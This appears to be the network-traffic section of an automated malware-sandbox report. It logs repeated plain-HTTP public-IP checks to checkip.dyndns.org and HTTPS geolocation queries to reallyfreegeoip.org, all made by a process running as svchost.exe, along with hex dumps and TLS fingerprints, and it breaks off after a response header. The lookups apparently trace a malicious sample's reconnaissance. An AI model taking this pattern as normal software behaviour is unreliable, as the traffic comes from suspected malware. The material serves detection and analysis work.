                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.549707158.101.44.242805260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:34:38.141247988 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 25, 2024 03:34:38.774713039 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:38 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 8f9508484bd9c064de147ca236a741dc
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.549709158.101.44.242805260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:34:39.417939901 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 25, 2024 03:34:40.090599060 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:39 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 77ec107762ee12b846e8f79757092a3f
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.549711158.101.44.242805260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:34:40.751226902 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 25, 2024 03:34:41.385307074 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:41 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 811357442121ef4d4872e79af74668d6
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.549713158.101.44.242805260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:34:42.044313908 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 25, 2024 03:34:42.646853924 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:42 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: c29a6367ac87154934bbe9af258b58d9
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.549715158.101.44.242805260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:34:43.305710077 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:34:43.904547930 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:43 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 568d5e7a93cc5b6068b4432a5f43a311
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      6192.168.2.549717158.101.44.242805260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:34:44.836606026 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:34:45.479860067 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:45 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: cfb921e7a08799752d9f5786a4c4ec32
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      7192.168.2.549719158.101.44.242805260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:34:46.159454107 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:34:46.787453890 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:46 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 788ad6c4d1548a5ad10fcff06d1d98ae
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      8192.168.2.549722158.101.44.242806024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:34:49.139708996 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:34:50.102118969 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:50 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 19d5a3b224f09e10d21151cb9264da3b
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                      Jul 25, 2024 03:34:50.112905025 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 25, 2024 03:34:50.316365004 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:50 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: b3886f8a215f8f02e9fe12f4453a4d66
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                      Jul 25, 2024 03:34:51.615945101 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 25, 2024 03:34:52.521858931 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:52 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 2da0422689acb4b67cda7287b8f02a33
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      9192.168.2.549732158.101.44.242806024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:34:53.140341043 CEST127OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Jul 25, 2024 03:34:53.756190062 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:53 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 17474eebdaf53caf6eac3d5f973d090d
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      10192.168.2.549736158.101.44.242806024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:35:24.493671894 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:35:25.104382038 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:25 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: e1b77715ae9f6e48a8bfe1d501a4d955
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.549738158.101.44.242806024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:35:25.773118019 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:35:26.399452925 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:26 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: f29f79b39c31ff8e5bf88e3f162cf36c
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      12192.168.2.549740158.101.44.242806024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:35:27.008814096 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:35:27.642046928 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:27 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 6c8d0c1789a073c92d7ed114fe217023
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      13192.168.2.549742158.101.44.242806024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:35:28.282684088 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:35:28.918694019 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:28 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: 1ba81e01a8be9ffa79c16fee9989c482
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      14192.168.2.549745158.101.44.242806024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:35:29.547746897 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:35:30.161107063 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:30 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: cf8a16373ff7755a68d3e3f98e073281
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      15192.168.2.549747158.101.44.242806024C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      Jul 25, 2024 03:35:30.856669903 CEST151OUTGET / HTTP/1.1
                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                      Host: checkip.dyndns.org
                                      Connection: Keep-Alive
                                      Jul 25, 2024 03:35:31.458009958 CEST320INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:35:31 GMT
                                      Content-Type: text/html
                                      Content-Length: 103
                                      Connection: keep-alive
                                      Cache-Control: no-cache
                                      Pragma: no-cache
                                      X-Request-ID: e655849517cab7d7d8868b0a30b5257e
                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                      HTTPS Connections

                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                      Jul 25, 2024 03:35:24.250891924 CEST188.114.97.3443192.168.2.549733CN=reallyfreegeoip.org CN=WE1, O=Google Trust Services, C=US CN=GTS Root R4, O=Google Trust Services LLC, C=USCN=WE1, O=Google Trust Services, C=US CN=GTS Root R4, O=Google Trust Services LLC, C=US CN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEThu Jul 04 23:28:37 CEST 2024 Wed Dec 13 10:00:00 CET 2023 Wed Nov 15 04:43:21 CET 2023Wed Oct 02 23:28:36 CEST 2024 Tue Feb 20 15:00:00 CET 2029 Fri Jan 28 01:00:42 CET 2028769,49162-49161-49172-49171-53-47-10,0-10-11-35-23-65281,29-23-24,054328bd36c14bd82ddaa0c04b25ed9ad
                                      CN=WE1, O=Google Trust Services, C=USCN=GTS Root R4, O=Google Trust Services LLC, C=USWed Dec 13 10:00:00 CET 2023Tue Feb 20 15:00:00 CET 2029
                                      CN=GTS Root R4, O=Google Trust Services LLC, C=USCN=GlobalSign Root CA, OU=Root CA, O=GlobalSign nv-sa, C=BEWed Nov 15 04:43:21 CET 2023Fri Jan 28 01:00:42 CET 2028

                                      HTTPS Proxied Packets

                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      0192.168.2.549705188.114.97.34435260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:34:36 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      Connection: Keep-Alive
                                      2024-07-25 01:34:37 UTC691INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:37 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: MISS
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sXxksWmmaUlY6L9FpfNl68IgGKwx1GBFryvim9ccehgYoeCRnGR5ZCGPGCwFC%2Bpo4GEwAJxTpghWjrwnl2Oh2IXQOHcn7YFvXm5WuVs3sy3VCgvHOP75OrAjabILLWCmSVVh9Xti"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a8868987f8a7298-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-07-25 01:34:37 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                      Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                      2024-07-25 01:34:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.549706188.114.97.34435260C:\Windows\SysWOW64\svchost.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-25 01:34:37 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                      Host: reallyfreegeoip.org
                                      2024-07-25 01:34:38 UTC700INHTTP/1.1 200 OK
                                      Date: Thu, 25 Jul 2024 01:34:38 GMT
                                      Content-Type: application/xml
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      access-control-allow-origin: *
                                      vary: Accept-Encoding
                                      Cache-Control: max-age=86400
                                      CF-Cache-Status: HIT
                                      Age: 1
                                      Last-Modified: Thu, 25 Jul 2024 01:34:37 GMT
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7FTRLQQzScfAJvUitUS0Cu0zNOWwjX7GMytkN0ookJXALgAco8AuQMux%2BFzaOI0Rsro05xok05Vq11Aj1ghFMKbclWwFN6I7%2F7sIb7IpCNY5HPlBO1KjLFWv3R5FGLuhqprqZNcW"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8a88689fc95f42e4-EWR
                                      alt-svc: h3=":443"; ma=86400
